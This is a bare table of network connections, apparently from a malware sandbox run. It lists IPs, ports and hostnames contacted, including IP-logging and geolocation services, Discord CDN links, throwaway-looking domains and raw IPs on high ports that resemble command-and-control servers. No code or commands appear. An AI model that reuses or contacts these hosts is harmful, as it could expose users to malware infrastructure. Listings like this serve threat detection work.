| N/A | 52.219.64.23:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 104.26.8.187:80 | proxycheck.io | tcp |
| N/A | 195.2.78.163:25450 | tcp | |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.145.110:443 | a.goatagame.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 52.219.64.127:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 52.219.62.52:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 95.181.172.100:55640 | tcp | |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 186.2.171.3:80 | 186.2.171.3 | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 144.202.76.47:443 | www.listincode.com | tcp |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.21.79.144:443 | a.goatgame.co | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 52.222.137.218:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 52.222.137.218:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 188.40.106.215:80 | s3.tebi.io | tcp |
| N/A | 72.21.91.29:80 | statuse.digitalcertvalidation.com | tcp |
| N/A | 188.40.106.215:80 | s3.tebi.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 52.219.62.123:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 52.219.62.123:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.67.178.16:443 | bestinternetstore.xyz | tcp |
| N/A | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.18.20.226:80 | crl.globalsign.com | tcp |
| N/A | 8.8.8.8:53 | readinglistforaugust3.xyz | udp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 104.26.8.187:80 | proxycheck.io | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 195.2.78.163:25450 | tcp | |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.156.42:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 52.219.156.42:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 8.8.8.8:53 | connectini.net | udp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 95.181.172.100:55640 | tcp | |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 8.8.8.8:53 | perfect-request-smart.com | udp |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 8.8.8.8:53 | download-serv-234116.xyz | udp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 135.181.123.52:12073 | tcp | |
| N/A | 34.201.81.34:443 | paybiz.herokuapp.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 195.171.92.116:80 | geo.netsupportsoftware.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.217.19.196:80 | www.google.com | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 23.217.250.58:80 | go.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | dmd.metaservices.microsoft.com | udp |
| N/A | 52.247.37.26:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 94.140.112.12:80 | trecker33442aq.top | tcp |
| N/A | 94.140.112.12:80 | trecker33442aq.top | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.16.202.237:443 | www.mediafire.com | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 199.91.155.72:443 | download2331.mediafire.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 2.22.22.217:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 52.45.132.150:443 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 3.86.130.101:443 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 104.22.65.104:443 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 158.69.65.151:80 | www.geodatatool.com | tcp |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 172.67.26.25:443 | tcp | |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 81.16.141.221:8888 | 81.16.141.221 | tcp |
| N/A | 158.69.65.151:443 | www.geodatatool.com | tcp |
| N/A | 185.180.231.69:42875 | 185.180.231.69 | tcp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 13.32.240.78:443 | tcp | |
| N/A | 2.22.22.225:443 | tcp | |
| N/A | 52.142.114.2:443 | tcp | |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 81.16.141.221:8888 | 81.16.141.221 | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 45.129.236.6:63318 | tcp | |
| N/A | 158.69.65.151:80 | www.geodatatool.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 158.69.65.151:443 | www.geodatatool.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 74.114.154.22:443 | eduarroma.tumblr.com | tcp |
| N/A | 91.142.79.35:61437 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 188.34.200.103:80 | 188.34.200.103 | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 194.145.227.159:80 | 194.145.227.159 | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 98.126.176.53:443 | vpn.maskvpn.org | tcp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.148.61:443 | source3.boys4dayz.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 174.139.80.66:432 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.137.37:443 | mybrowserinfo.com | tcp |
| N/A | 172.67.171.54:80 | cache.uutww77.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 91.142.79.35:61437 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.107:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 20.82.210.154:443 | tcp | |
| N/A | 142.250.179.174:80 | www.google-analytics.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 54.224.34.30:443 | paybiz.herokuapp.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.43.75.27:80 | tl.symcd.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 23.43.75.27:80 | tl.symcd.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 23.73.0.144:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.107:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.225:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 54.225.64.149:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.107:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.179:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.225:443 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.107:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.197.240:80 | tcp | |
| N/A | 139.45.195.8:80 | tcp | |
| N/A | 138.68.244.123:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.100.48.86:443 | tcp | |
| N/A | 104.80.224.34:443 | tcp | |
| N/A | 104.80.224.121:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 34.242.179.188:443 | tcp | |
| N/A | 151.101.1.175:443 | tcp | |
| N/A | 104.80.224.233:443 | tcp | |
| N/A | 52.19.186.105:443 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 104.22.53.252:443 | tcp | |
| N/A | 104.80.224.132:443 | tcp | |
| N/A | 15.188.95.229:443 | tcp | |
| N/A | 104.80.228.121:443 | tcp | |
| N/A | 54.154.124.189:443 | tcp | |
| N/A | 52.39.53.231:443 | tcp | |
| N/A | 34.248.191.66:443 | tcp | |
| N/A | 52.19.186.105:443 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 54.154.124.189:443 | tcp | |
| N/A | 52.39.53.231:443 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 142.251.36.8:443 | udp | |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 34.242.179.188:443 | tcp | |
| N/A | 23.100.48.86:443 | tcp | |
| N/A | 35.186.249.72:443 | tcp | |
| N/A | 18.130.94.104:443 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 35.222.211.90:443 | tcp | |
| N/A | 151.101.1.175:443 | tcp | |
| N/A | 104.80.224.121:443 | tcp | |
| N/A | 18.130.94.104:443 | tcp | |
| N/A | 52.21.125.88:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 35.241.45.82:443 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 193.56.146.22:47861 | tcp | |
